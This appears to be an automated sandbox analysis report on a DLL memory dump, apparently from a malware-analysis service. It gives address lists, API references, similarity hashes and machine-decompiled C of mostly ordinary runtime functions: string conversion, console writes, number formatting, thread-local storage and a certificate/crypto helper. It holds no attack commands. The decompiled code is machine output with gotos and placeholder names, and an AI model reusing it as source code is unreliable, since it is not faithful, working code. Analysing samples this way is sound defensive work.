0x6e545465
0x6e545467
0x6e54560b
0x6e54560d
0x00000000
0x6e54560f
0x6e54560f
0x6e545612
0x6e545621
0x6e545625
0x6e545626
0x6e545626
0x00000000
0x6e54562a
0x6e54546d
0x6e54546f
0x6e545475
0x6e545478
0x6e545484
0x6e54548d
0x6e545498
0x6e54549d
0x6e5454a0
0x6e5454a3
0x00000000
0x6e5454a9
0x6e5454a9
0x00000000
0x6e5454a9
0x6e5454a3
0x6e5453a6
0x6e5453b5
0x6e5453b6
0x6e5453b9
0x6e5453bc
0x6e5453c1
0x6e5455d7
0x6e5455d9
0x6e5455db
0x6e5455dd
0x6e5455e7
0x6e5455ef
0x6e5455f1
0x6e5455f2
0x6e5455f6
0x6e5455f9
0x6e5455f9
0x6e5455fd
0x6e5455fd
0x6e5455fd
0x6e545600
0x6e545600
0x6e545600
0x6e545602
0x6e545602
0x6e545606
0x6e5453c7
0x6e5453c7
0x6e5453ca
0x6e5453cc
0x6e5453cf
0x6e5453d2
0x6e5453d6
0x6e5453d7
0x6e5453db
0x6e5453de
0x6e5453e3
0x6e5453ed
0x6e5453f2
0x6e5453f5
0x6e5453f8
0x6e5453f8
0x6e5453fb
0x6e5453fe
0x6e545400
0x6e545409
0x6e54540d
0x6e54540e
0x6e545412
0x6e545418
0x6e545421
0x6e54542e
0x6e545435
0x6e545439
0x6e545444
0x6e545449
0x6e54544f
0x00000000
0x6e545455
0x6e5454ac
0x6e5454ad
0x6e545530
0x6e545537
0x6e54553f
0x6e545547
0x6e54554c
0x6e54554f
0x6e545554
0x00000000
0x6e54555a
0x6e54556f
0x6e54564f
0x6e545655
0x00000000
0x6e545575
0x6e54557e
0x6e545580
0x6e545586
0x00000000
0x6e54558c
0x6e545590
0x6e5455c6
0x6e5455c9
0x00000000
0x6e5455cf
0x6e5455cf
0x00000000
0x6e5455cf
0x6e545592
0x6e545594
0x6e545596
0x6e5455af
0x00000000
0x6e5455b5
0x6e5455b9
0x00000000
0x6e5455bf
0x6e5455bf
0x6e5455c2
0x6e5455c3
0x00000000
0x6e5455c3
0x6e5455b9
0x6e5455af
0x6e545590
0x6e545586
0x6e54556f
0x6e545554
0x6e54544f
0x6e5453c1
0x00000000
0x6e5454b1
0x6e5454b1
0x6e5454b5
0x6e5454b8
0x6e5454da
0x6e5454dd
0x6e5454e2
0x6e5454e6
0x6e5454ea
0x6e545518
0x6e54551a
0x00000000
0x6e5454ec
0x6e5454ec
0x6e5454ec
0x6e5454ef
0x6e5454f2
0x6e5454f5
0x6e54562c
0x6e54562f
0x6e54563c
0x6e545647
0x6e54564c
0x00000000
0x6e5454fb
0x6e545502
0x6e545507
0x6e54550a
0x6e54550d
0x00000000
0x6e545513
0x6e545513
0x00000000
0x6e545513
0x6e54550d
0x6e5454f5
0x6e5454ba
0x6e5454c1
0x6e5454c6
0x6e5454cc
0x6e5454ce
0x6e5454d5
0x6e54551b
0x6e54551e
0x6e54551f
0x6e545524
0x6e545527
0x6e54552a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54552a
0x00000000
0x6e5454b8
0x6e545353
0x6e54565b
0x6e54565b
0x6e54565d
0x6e545660
0x6e545660
0x6e545660
0x6e545660
0x6e545672
0x6e545674
0x6e545675
0x6e545676
0x6e545678
0x6e545680

APIs

GetConsoleOutputCP.KERNEL32(?,6E53413C,900C408B), ref: 6E54531D
__fassign.LIBCMT ref: 6E545502
__fassign.LIBCMT ref: 6E54551F
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E545567
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E5455A7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E54564F

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 9322ce14192534dcead21a3dfe630a1150be05bde34583459c62484cf4b8979b
Instruction ID: 59acf846013df5c9b3d1aae1001c2ff29d2e3ccb341080cc0b30280328cd7a9a
Opcode Fuzzy Hash: 9322ce14192534dcead21a3dfe630a1150be05bde34583459c62484cf4b8979b
Instruction Fuzzy Hash: 05C18B75D04259DFDB01CFE8C8909EDBBF9AF49314F28816AE865BB341D6319A06CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E52F03D, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6E52F086
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6E52F0F1
LCMapStringEx.KERNEL32 ref: 6E52F10E
LCMapStringEx.KERNEL32 ref: 6E52F14D
LCMapStringEx.KERNEL32 ref: 6E52F1AC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6E52F1CF

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: d0203f0d8b14065ee08044f9740cece7ca293abe7531684672249592b6e7ccf2
Instruction ID: 830de9e953c8de98f5044c5fc67f0499b2586fdf7559fe5e3c414ea71ebaa345
Opcode Fuzzy Hash: d0203f0d8b14065ee08044f9740cece7ca293abe7531684672249592b6e7ccf2
Instruction Fuzzy Hash: 7851CE7290061AAFEF108FA5EC40FAB3BE9EF45744F614439F915AA190E731D9109B70

Uniqueness

Uniqueness Score: -1.00%

Function 6E5858E0, Relevance: 9.1, APIs: 6, Instructions: 130
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E6E5858E0(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4, char* _a8) {
				signed int _v8;
				short* _v12;
				short* _v16;
				void* _v28;
				void* __esi;
				void* __ebp;
				signed int _t27;
				intOrPtr _t29;
				short* _t39;
				short* _t43;
				void* _t49;
				int _t51;
				int _t52;
				void* _t54;
				void* _t63;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t72;
				short* _t73;

				E6E52F9A0();
				_t27 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t27 ^ _t72;
				_push(__ebx);
				_t68 = _a4;
				_push(__edi);
				_v12 = 0;
				_t29 =  *((intOrPtr*)(_t68 + 0x20));
				if(_t29 <= 0) {
					L12:
					_pop(_t69);
					return E6E52F227(_v8 ^ _t72, _t69);
				} else {
					if(_t29 <= 2) {
						_push(0);
						_push(_t68);
						_t63 = E6E587200(__ebx, _t54, __edi, _t72, __fp0);
						if(_t63 == 0) {
							goto L12;
						} else {
							_push(_t63);
							_push(_a8);
							_push(_t68);
							_t49 = E6E5856E0(__ebx, _t63, _t68, _t72, __fp0);
							if(_t49 != 0) {
								_v12 = E6E585AE0(_t49, _t72, __fp0, _t68, _t49);
								__imp__CertFreeCertificateContext(_t49);
							}
							__imp__CertCloseStore(0);
							_t70 = _t63;
							return E6E52F227(_v8 ^ _t72, _t70);
						}
					} else {
						if(_t29 != 3) {
							goto L12;
						} else {
							_t51 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
							if(_t51 == 0) {
								goto L12;
							} else {
								E6E530020();
								_t39 = _t73;
								_v16 = _t39;
								if(MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t39, _t51) == 0) {
									goto L12;
								} else {
									_t52 = MultiByteToWideChar(0, 0,  *(_t68 + 0xc), 0xffffffff, 0, 0);
									if(_t52 == 0) {
										goto L12;
									} else {
										E6E530020();
										_t43 = _t73;
										_v12 = _t43;
										if(MultiByteToWideChar(0, 0,  *(_t68 + 0xc), 0xffffffff, _t43, _t52) == 0) {
											goto L12;
										} else {
											_push( *((intOrPtr*)(_t68 + 8)));
											_push( *((intOrPtr*)(_t68 + 0x10)));
											_push(_v12);
											_push(_v16);
											E6E585B30(_t52, MultiByteToWideChar, _t72, __fp0);
											_t71 = _t68;
											return E6E52F227(_v8 ^ _t72, _t71);
										}
									}
								}
							}
						}
					}
				}
			}

0x6e5858e8
0x6e5858ed
0x6e5858f4
0x6e5858f7
0x6e5858f9
0x6e5858fc
0x6e5858fd
0x6e585904
0x6e585909
0x6e585a1e
0x6e585a24
0x6e585a33
0x6e58590f
0x6e585912
0x6e5859c6
0x6e5859c8
0x6e5859ce
0x6e5859d5
0x00000000
0x6e5859d7
0x6e5859d7
0x6e5859d8
0x6e5859db
0x6e5859e1
0x6e5859e8
0x6e5859f4
0x6e5859f8
0x6e5859f8
0x6e585a01
0x6e585a0e
0x6e585a1d
0x6e585a1d
0x6e585918
0x6e58591b
0x00000000
0x6e585921
0x6e585936
0x6e58593a
0x00000000
0x6e585940
0x6e585943
0x6e585948
0x6e585951
0x6e58595c
0x00000000
0x6e585962
0x6e585971
0x6e585975
0x00000000
0x6e58597b
0x6e58597e
0x6e585983
0x6e58598c
0x6e585997
0x00000000
0x6e58599d
0x6e58599d
0x6e5859a0
0x6e5859a3
0x6e5859a6
0x6e5859aa
0x6e5859b6
0x6e5859c5
0x6e5859c5
0x6e585997
0x6e585975
0x6e58595c
0x6e58593a
0x6e58591b
0x6e585912

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6E585934
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 6E585958
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 6E58596F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 6E585993

Part of subcall function 6E585B30: CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 6E585C41
Part of subcall function 6E585B30: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6E585C75

CertFreeCertificateContext.CRYPT32(00000000), ref: 6E5859F8
CertCloseStore.CRYPT32(00000000,00000000), ref: 6E585A01

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$CertContext$AcquireCertificateCloseCryptErrorFreeLastStore
String ID:
API String ID: 3186997219-0
Opcode ID: 4b0eb2159d82a3d029eb1085b326402bbca35a2341f97958367847ea3803c688
Instruction ID: 72480952f275e19a45a8cfb56f3e770db225c14242845744370301e8327a43c1
Opcode Fuzzy Hash: 4b0eb2159d82a3d029eb1085b326402bbca35a2341f97958367847ea3803c688
Instruction Fuzzy Hash: CA41E331740219BBEF109FD99C81FEFB7E8DF45321F600126FA26A62C0DB7199108760

Uniqueness

Uniqueness Score: -1.00%

Function 6E5420C9, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E5420C9(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, char _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				_t4 =  &_a36; // 0x6e53556e
				 *_t177 = 0;
				E6E53541F( &_v60, _t163,  *_t4);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E6E611E20( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E6E5428E4(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E6E531060(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E6E611E20( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x2
										_t168 = _t63;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E6E611D20();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E6E611D20();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E6E611D20();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t68 = _t168 + 1; // 0x1
													_t174 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E6E5423D8(_t133, _t139, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E6E611F50(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E6E537E6F(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E6E53495F();
				goto L66;
			}

0x6e5420c9
0x6e5420d4
0x6e5420d9
0x6e5420db
0x6e5420db
0x6e5420df
0x6e5420e5
0x6e5420e8
0x6e5420ea
0x6e5420ef
0x6e5420f2
0x6e5420f5
0x6e54210b
0x6e54210e
0x6e542113
0x6e54211d
0x6e542122
0x6e542179
0x6e54217b
0x6e54218a
0x6e54218d
0x6e542190
0x6e542192
0x6e542199
0x6e5421ab
0x6e5421ae
0x6e5421b3
0x6e5421b7
0x6e5421b8
0x6e5421d8
0x6e5421db
0x6e5421db
0x6e5421db
0x6e5421dd
0x6e5421dd
0x6e5421e0
0x6e5421e3
0x6e5421e5
0x6e5421f6
0x6e5421e7
0x6e5421e7
0x6e5421e7
0x6e5421f8
0x6e5421fd
0x6e5421fd
0x6e542202
0x6e542205
0x6e54220f
0x6e542211
0x6e542213
0x6e542218
0x6e542219
0x6e54221c
0x6e54221f
0x6e542222
0x6e542222
0x6e542224
0x00000000
0x00000000
0x6e54223b
0x6e542242
0x6e542246
0x6e542249
0x6e54224c
0x6e54224e
0x6e54224e
0x6e54224e
0x6e542254
0x6e542257
0x6e54225b
0x6e54225d
0x6e542261
0x6e542264
0x6e542267
0x6e542268
0x6e54226b
0x6e54226e
0x6e542271
0x6e542271
0x6e542276
0x6e542279
0x6e54227c
0x00000000
0x00000000
0x6e542285
0x6e54228a
0x6e54228d
0x6e54228f
0x00000000
0x00000000
0x6e542293
0x6e542296
0x6e542297
0x6e542297
0x6e542299
0x6e54229c
0x00000000
0x00000000
0x6e54229e
0x6e5422a1
0x6e5422a8
0x6e5422ab
0x6e5422ae
0x6e5422c3
0x6e5422c3
0x6e5422c3
0x6e5422b0
0x6e5422b0
0x6e5422b3
0x6e5422bd
0x6e5422bd
0x6e5422b5
0x6e5422b8
0x6e5422b8
0x6e5422bf
0x6e5422bf
0x00000000
0x6e5422ae
0x6e5422a3
0x6e5422a3
0x6e5422a5
0x6e5422a5
0x6e542207
0x6e542207
0x6e542209
0x6e5422c6
0x6e5422c6
0x6e5422c8
0x6e5422ca
0x6e5422cd
0x6e5422ce
0x6e5422cf
0x6e5422d0
0x6e5422d8
0x6e5422d8
0x6e5422da
0x6e5422da
0x6e5422dd
0x6e5422e0
0x6e5422e3
0x6e5422e5
0x6e5422e7
0x6e5422e7
0x6e5422f4
0x6e5422fb
0x6e542302
0x6e542304
0x6e54230d
0x6e54230d
0x6e542310
0x6e542312
0x6e542312
0x6e542315
0x6e542318
0x6e542324
0x6e542324
0x6e542328
0x6e54232b
0x6e54232d
0x00000000
0x6e54231a
0x6e54231a
0x6e542320
0x6e542320
0x6e54232e
0x6e54232e
0x6e542331
0x6e542335
0x6e542336
0x6e542338
0x6e54233a
0x6e54233c
0x6e542366
0x6e542366
0x6e542368
0x6e542375
0x6e542375
0x6e542376
0x6e542377
0x6e542379
0x6e54237b
0x6e542380
0x6e542382
0x6e542386
0x6e542389
0x6e54238c
0x6e54238e
0x6e54238f
0x6e54238f
0x6e542391
0x6e542391
0x6e542393
0x6e5423a0
0x6e5423a0
0x6e5423a1
0x6e5423a2
0x6e5423a4
0x6e5423a5
0x6e5423a6
0x6e5423af
0x6e5423b2
0x6e5423b4
0x6e5423b5
0x6e5423b5
0x6e5423b7
0x6e5423b7
0x6e5423b7
0x6e5423ba
0x6e5423bc
0x6e5423bf
0x6e5423c1
0x6e5423c7
0x6e5423cc
0x6e5423cc
0x6e5423d7
0x6e5423d7
0x6e542395
0x6e542397
0x00000000
0x00000000
0x6e542399
0x00000000
0x00000000
0x6e54239b
0x6e54239e
0x00000000
0x00000000
0x00000000
0x6e54239e
0x6e54236a
0x6e54236c
0x00000000
0x00000000
0x6e54236e
0x00000000
0x00000000
0x6e542370
0x6e542373
0x00000000
0x00000000
0x00000000
0x6e542373
0x6e54233e
0x6e542343
0x6e542349
0x6e542349
0x6e54234a
0x6e54234b
0x6e54234c
0x6e54234e
0x6e542353
0x6e542355
0x6e542357
0x6e54235c
0x6e54235f
0x6e542361
0x6e542361
0x6e542364
0x6e542364
0x00000000
0x6e542364
0x6e542345
0x6e542347
0x00000000
0x00000000
0x00000000
0x6e542347
0x6e54231c
0x6e54231e
0x00000000
0x00000000
0x00000000
0x6e54231e
0x6e542318
0x00000000
0x6e542209
0x6e542205
0x6e5421ba
0x6e5421c6
0x6e5421c6
0x6e5421c8
0x6e5421cf
0x00000000
0x6e5421cf
0x6e5421ca
0x00000000
0x6e5421ca
0x6e54217d
0x6e542183
0x6e542183
0x6e542186
0x6e542186
0x6e542187
0x00000000
0x6e542187
0x6e54217f
0x6e542181
0x00000000
0x00000000
0x00000000
0x6e542181
0x6e54213f
0x6e542144
0x6e542146
0x6e542153
0x6e54215a
0x6e54215c
0x6e542167
0x6e542167
0x6e54216a
0x6e54216c
0x6e54216c
0x6e542170
0x6e542148
0x6e542148
0x6e542148
0x00000000
0x6e542146
0x6e5420f7
0x6e5420fe
0x6e5420ff
0x6e542101
0x00000000

APIs

_strrchr.LIBCMT ref: 6E542153

Strings

nUSn, xrefs: 6E5420E5

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID: nUSn
API String ID: 3213747228-2874601919
Opcode ID: b0b015a783229c4660ca605a26be336b9a403dfab562984da44fdcec99ae7e0f
Instruction ID: fee09f2ac45f9165d91647cedbabc63bac17ddcfc95f1a74b83fd4cf845ace42
Opcode Fuzzy Hash: b0b015a783229c4660ca605a26be336b9a403dfab562984da44fdcec99ae7e0f
Instruction Fuzzy Hash: 91B1277A9082A6DFDB05CFA8C890BFEBBF5EF85340F148569D954EB241D2348D42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E532561, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E532561(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e688c50 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E53371B(_t13, __eflags,  *0x6e688c50);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E533756(_t14, __eflags,  *0x6e688c50, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E5378B6();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E533756(_t18, __eflags,  *0x6e688c50, 0);
								} else {
									_t8 = E6E533756(_t18, __eflags,  *0x6e688c50, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E5378C1(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e532561
0x6e532568
0x6e53257b
0x6e532582
0x6e532584
0x6e532585
0x6e532588
0x6e5325a1
0x6e5325a1
0x6e53258a
0x6e53258a
0x6e53258c
0x6e532596
0x6e53259d
0x6e53259f
0x6e5325a6
0x6e5325af
0x6e5325b2
0x6e5325b3
0x6e5325b5
0x6e5325c9
0x6e5325c9
0x6e5325d2
0x6e5325b7
0x6e5325be
0x6e5325c4
0x6e5325c5
0x6e5325c7
0x6e5325db
0x6e5325dd
0x6e5325dd
0x00000000
0x00000000
0x00000000
0x6e5325c7
0x6e5325e0
0x00000000
0x00000000
0x00000000
0x6e53259f
0x6e53258c
0x6e5325e8
0x6e5325f2
0x6e53256a
0x6e53256c
0x6e53256c

APIs

GetLastError.KERNEL32(00000001,?,6E532472,6E52FCE9,6E52F2CD,?,6E52F505,?,00000001,?,?,00000001,?,6E684240,0000000C,6E52F5FE), ref: 6E53256F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E53257D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E532596
SetLastError.KERNEL32(00000000,6E52F505,?,00000001,?,?,00000001,?,6E684240,0000000C,6E52F5FE,?,00000001,?), ref: 6E5325E8

